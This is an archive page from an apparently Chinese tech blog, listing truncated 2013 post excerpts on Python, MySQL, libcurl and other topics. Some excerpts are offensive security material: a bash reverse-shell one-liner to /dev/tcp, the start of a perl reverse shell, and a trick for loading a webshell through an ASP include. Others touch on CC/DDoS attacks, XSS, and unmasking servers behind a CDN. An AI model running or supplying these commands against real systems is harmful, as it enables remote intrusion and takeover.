admin的文章

12年前 (2013-07-19) 1794浏览 0评论

将大马写到一个txt文件里面，命名为dama.txt 再建一个文本文档，asp的就写入： <!–#include file=”dama.txt”–>保存为x.asp 两个文件传同目录下，...

12年前 (2013-07-19) 1413浏览 0评论

安全研究人员Dan Melamed近日发现了一个Facebook平台的严重漏洞，可以允许攻击者完全控制任何账号。 这个漏洞之所以被认为严重是因为它允许黑客悄悄的黑掉任何Facebook账户。Dan Melamed在他的博客中发表了这个漏洞，他指出黑客...

12年前 (2013-07-18) 1678浏览 0评论

国内多家知名网站泄露用户密码的事件早已经耳熟能详了，但大家每天还是得继续跟各种网站打交道，为了以后账户密码不怕被一锅端，很多人都宁愿针对不同网站设置多个不同的密码(或使用花密等工具)，这样虽然安全了，但也带来了记忆上很大的负担。   对于...

12年前 (2013-07-18) 1610浏览 0评论

一、列表去重（转换为集合） python 列表本身没有去重的功能，但是我们建议借助别的类型来完成去重的功能，比如集合。 a = [1,2,3,3,2,4] b = set() a = list(set(a)) print a 思路先用set先转换成集...

12年前 (2013-07-17) 1719浏览 0评论

bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ，注意某些linux不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;...

12年前 (2013-07-17) 1839浏览 0评论

发布日期：2011-12-08 09:00:00 浏览次数：2982 文章作者：Nuclear’Atk 网友评论：12 评论 最后修改：2012-12-04 12:40:0 关于：基于js的CC攻击实现与防御、以及图片方式的DDOS、CC...

12年前 (2013-07-17) 2511浏览 3评论

2013.05.21 No Comments 前言：作者是个懒人，又犯了五月病，什么都懒得做，编辑了好几次文章，后来都不了了之了 但是时间紧迫，下个月就要跨省去外地了，看见大家好像对狗狗很有热情，所以就一口气把一篇笔记发出来了 本来没有那么长的，...

12年前 (2013-07-17) 1433浏览 1评论

1、 什么是WebApp Pentesting WebApp Pentesting，由PentesterLab出品。官方给自己的定义是一个简单又十分有效学习渗透测试的演练平台。它提供诸多的漏洞系统以供网络安全发烧友进行测试和让黑阔们更加深刻地且透彻理...

12年前 (2013-07-16) 1797浏览 0评论

关于如何查找“CDN”真实IP地址的方法 现在很多网站用了cdn技术，在做一些测试的时候，想获取其服务器真实IP地址就有点困难，不知道现在还有其他什么好的方法呢，整理了下，目前知道如下两种： 1：拿CDN服务器 找出真实IP cache_peer 1...

12年前 (2013-07-16) 1582浏览 1评论

起因是这个帖子：大宝贝们的货已经发出，近期注意查收。 帖子中有@疯狗 给乌云礼品拍的一张照片。 然后细心的@HuGtion 通过这张照片的EXIF信息获取到了疯狗在拍这张照片时的经纬度信息（部分马赛克，用星号代替）： 39;*0;86.*00000...

12年前 (2013-07-16) 1157浏览 0评论

顾客信息对于零售业者来说意义非凡，尤其在如今的科技允许商家大量收集并分析顾客个人信息的情况下。像亚马逊这样的线上零售者可以通过 cookies 轻松收集浏览者的数据，从消费习惯、购买时间到购买周期，还有各种售后信息收集。如果把整个消费者群体比成一座...

12年前 (2013-07-16) 1094浏览 0评论

2011年02月18日12:36 腾讯科技讯（Eloise）北京时间2月17日消息，据国 外媒体报道，问答服务网站如今正获得广泛关注，部分原因得归功于崭露头角的硅谷新星问答网站Quora。Quora估值达到了3亿美元，已经成为许多技术 达人常去之处。...

12年前 (2013-07-16) 1713浏览 1评论

上周四，Google宣布从WebKit 分支出自己的浏览器渲染引擎 Blink。很多人觉得这像是晴天霹雳，或者甚至是迟到的愚人节笑话，但是其实这件事情是难以避免的，而且是历史的重演。 什么是WebKit？它到底是谁的？ WebKit 是一个开源的浏...

12年前 (2013-07-15) 3077浏览 2评论

mysql使用set names解决乱码问题的原理 解决乱码的方法，我们经常使用“set names utf8”,那么为什么加上这句代码就可以解决了呢？下面跟着我一起来深入set names utf8的内部执行原理 先说MySQL的字符集问题...

12年前 (2013-07-15) 3186浏览 1评论

其实很多公司、厂商及其他XXOO的都不太注重XSS的安全，特别是反射型。。理由是：%*(&$@)%(%)反正就是没危害怎么滴？ 好吧，让我来谈谈反射XSS的一个“危害”吧~~（仅供手机测试） 大家都知道，手机网页有些链接，一点击就会自动弹出短...

12年前 (2013-07-15) 1704浏览 1评论

Smarthosts是一个托管在谷歌代码上的项目，您可以轻松利用本项目使用到一份稳定的Hosts文件。 这份Hosts文件可以帮助您顺利打开一些网站，提高某些国外服务的打开或下载速度。 报告问题? 订阅SVN更新 | Github镜像 | So...

12年前 (2013-07-13) 1429浏览 0评论

在之前几个月里，我教一些不了解Python的孩子来慢慢熟悉这门语言。渐渐地，我发现了一些几乎所有Python初学者都会犯的错误，所以我决定跟来跟大家分享我的建议。这个系列的每个部分都会关注不同的常见错误，描述如何产生这种错误的，并且提供解决的方法。 ...

12年前 (2013-07-13) 2558浏览 1评论

错误代码列表 CURLE_UNSUPPORTED_PROTOCOL (1) – 您传送给 libcurl 的网址使用了此 libcurl 不支持的协议。 可能是您没有使用的编译时选项造成了这种情况（可能是协议字符串拼写有误，或没有指定协议 libc...

12年前 (2013-07-11) 1961浏览 0评论

C/C++中的变量分为全局变量、静态全局变量、局部变量和静态局部变量，在《C/C++中静态局部变量的特点与应用》中我们介绍过静态局部变量，今天我们的目标是全局变量。 单个文件中的全局变量 简单一点说，全局变量就是在函数外面定义的变量，下面是一个最简单...

12年前 (2013-07-09) 1443浏览 0评论

R作为开源的数据统计分析语言正潜移默化的在企业中扩大自己的影响力。特有的扩展插件可提供免费扩展，并且允许R语言引擎运行在Hadoop集群之上。 R语言是主要用于统计分析、绘图的语言和操作环境。R本来是由来自新西兰奥克兰大学的Ross Ihaka和R...